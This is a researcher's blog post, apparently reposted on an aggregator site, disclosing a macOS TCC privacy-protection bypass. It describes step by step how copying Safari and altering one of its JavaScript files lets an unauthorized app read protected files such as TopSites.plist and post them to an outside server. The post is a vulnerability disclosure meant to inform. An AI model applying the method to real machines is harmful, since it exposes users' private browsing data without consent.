内容简介:Today I'm disclosing a macOS privacy protections bypass. (You may recall that I disclosed another onelast year.) The privacy protections system (also known as TCC: Transparency, Consent, and Control) was introduced in macOS Mojave, and one of its purposes
June 30 2020 by Jeff Johnson
Support this blog: Link Unshortener , StopTheMadness , Underpass , PayPal.Me
Today I'm disclosing a macOS privacy protections bypass. (You may recall that I disclosed another onelast year.) The privacy protections system (also known as TCC: Transparency, Consent, and Control) was introduced in macOS Mojave, and one of its purposes is to protect certain files on your Mac from access by unauthorized apps. I've discovered a way for an unauthorized app to read the contents of protected files, thus bypassing the privacy protections. This issue exists in Mojave, Catalina, and the Big Sur beta. It remains unaddressed and is therefore, in one sense, a zero-day. Here's the timeline leading to my disclosure:
- September 2019: I discovered the issue.
- December 19, 2019: The Apple Security Bounty Program finally opens.
- December 19, 2019: I reported the issue to Apple Product Security.
- January 17, 2020: In response to my status update request, Apple Product Security tells me they're planning to address the issue in Spring 2020.
- April 27, 2020: In response to my status update request, Apple Product Security tells me they're still investigating the issue.
- June 22, 2020: The macOS 11 Big Sur beta is released to developers.
- June 29, 2020: In response to my status update request, Apple Product Security tells me they're still investigating the issue.
For technical reasons, I don't believe that the issue will be fixed by Apple before Big Sur is released to the public in the Fall. I've seen no evidence that Big Sur makes any effort in this direction, and Apple's email to me shows no evidence of that either. Therefore, I'm disclosing the issue now. It's been over 6 months since I reported the issue to Apple. This is well beyond the bounds of "responsible disclosure", which is typically 90 days after reporting an issue to a vendor. It's also becoming obvious that I will never get paid a bounty by Apple for anything I've reported to them, or at least not within a reasonable amount of time. I'm not interested in waiting years for a bounty. I can't speak for anyone else, but my personal experience is that the Apple Security Bounty Program has been a disappointment, and I don't plan to participate again in the future. With that said, here's my original report to Apple Product Security:
Attached is a sample Xcode project that demonstrates how a user-installed Mac app can access the contents of files restricted by TCC, specifically in ~/Library/Safari. This exploit works on the current public shipping version macOS 10.15.2. I've also tested on macOS 10.14.6.
To reproduce, simply build and run the sample app. The sample app will read the file ~/Library/Safari/TopSites.plist and HTTP POST the contents of the file to http://lapcatsoftware.com/test/
There are two fundamental flaws in TCC that make this exploit possible:
- TCC exceptions (recorded in "~/Library/Application Support/com.apple.TCC/TCC.db") are based on the bundle identifier of an app rather than the file path.
- TCC only superficially checks the code signature of the app.
Thus, an attacker can make a copy of an app at a different location on disk, modify the resources of the copy, and the copy of the app with modified resources will still have the same file access as the original app, in this case, Safari.
Safari has a particular issue that makes this exploit possible: it runs some JavaScript in the context of the main app rather than in the sandboxed context of the Web Content helper. The JavaScript that's run in the main app's context is used to display the Extensions pane in Safari Preferences. The main Safari app has access to the files in ~/Library/Safari, and thus any JavaScript run in that context also has this access.
My sample app makes a copy of Safari app and replaces the file "Safari.app/Contents/Resources/HTMLViewController.js" with a modified version. You'll see the addition of 10 lines of code at the beginning of the file.
The sample app contains a Safari extension whose sole purpose is to allow the use of the SafariServices API to open the Extensions pane in Safari Preferences. This only works with the original unmodified Safari. Thus, the sample app has a little workaround to make sure it opens in my modified Safari. It sets the NSQuitAlwaysKeepsWindows global preferences to make sure that windows open on quit reopen on next launch. Then it opens the Extensions pane in the original Safari, and it terminates the original Safari. As a consequence, when my modified Safari is launched, the Extensions pane will automatically reopen, causing my modified JavaScript to run.
This exploit will work with any restricted file that is accessible to Safari.
Download Xcode project: SafariPrivacyTest.zip
Let me explain the issue in slightly less technical terms. In this case, only Safari and Finder should be authorized (by Apple) to access the files in ~/Library/Safari, unless you grant special authorization to another app, such as giving "Full Disk Access" to Terminal. My bypass demonstrates that a maliciously crafted app can also access those files, without being given authorization. There are actually two maliciously crafted apps here: a modified version of Safari, which accesses the protected files, and the app that modifies Safari and launches the modified version of Safari. Any app that you download from the web could accomplish this privacy protections bypass. My sample exploit uploads some of your private data (your Top Sites, for example) to a server that I control, because that's an easy thing to do when I can run any JavaScript I want. Note that I'm not really collecting any data, as http://lapcatsoftware.com/test/ is a dead link. I used http so that you can see the private data being sent in a packet trace.
Should you be worried about this issue? That depends on how you feel in general about macOS privacy protections. Prior to Mojave, the privacy protections feature did not exist at all on the Mac, so you're not any worse off now than you were on High Sierra and earlier. My personal opinion is that macOS privacy protections are mainly security theater and only harm legitimate Mac developers while allowing malware apps to bypass them through many existing holes such as the one I'm disclosing, and that other security researchers have also found. I feel that if you already have a hostile non-sandboxed app running on your Mac, then you're in big trouble regardless, so these privacy protections won't save you. The best security is to be selective about which software you install, to be careful to avoid ever installing malware on your Mac in the first place. There's a reason that my security research has focused on macOS privacy protections: my goal is to show that Apple's debilitating lockdown of the Mac is not justified by alleged privacy and security benefits. In that respect, I think I've proved my point, over and over again. In any case, you have the right to know that the systems you rely on for protection are not actually protecting you.
Support this blog: Link Unshortener , StopTheMadness , Underpass , PayPal.Me
以上所述就是小编给大家介绍的《Disclosure: Another macOS privacy protections bypass》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Head First HTML and CSS
Elisabeth Robson、Eric Freeman / O'Reilly Media / 2012-9-8 / USD 39.99
Tired of reading HTML books that only make sense after you're an expert? Then it's about time you picked up Head First HTML and really learned HTML. You want to learn HTML so you can finally create th......一起来看看 《Head First HTML and CSS》 这本书的介绍吧!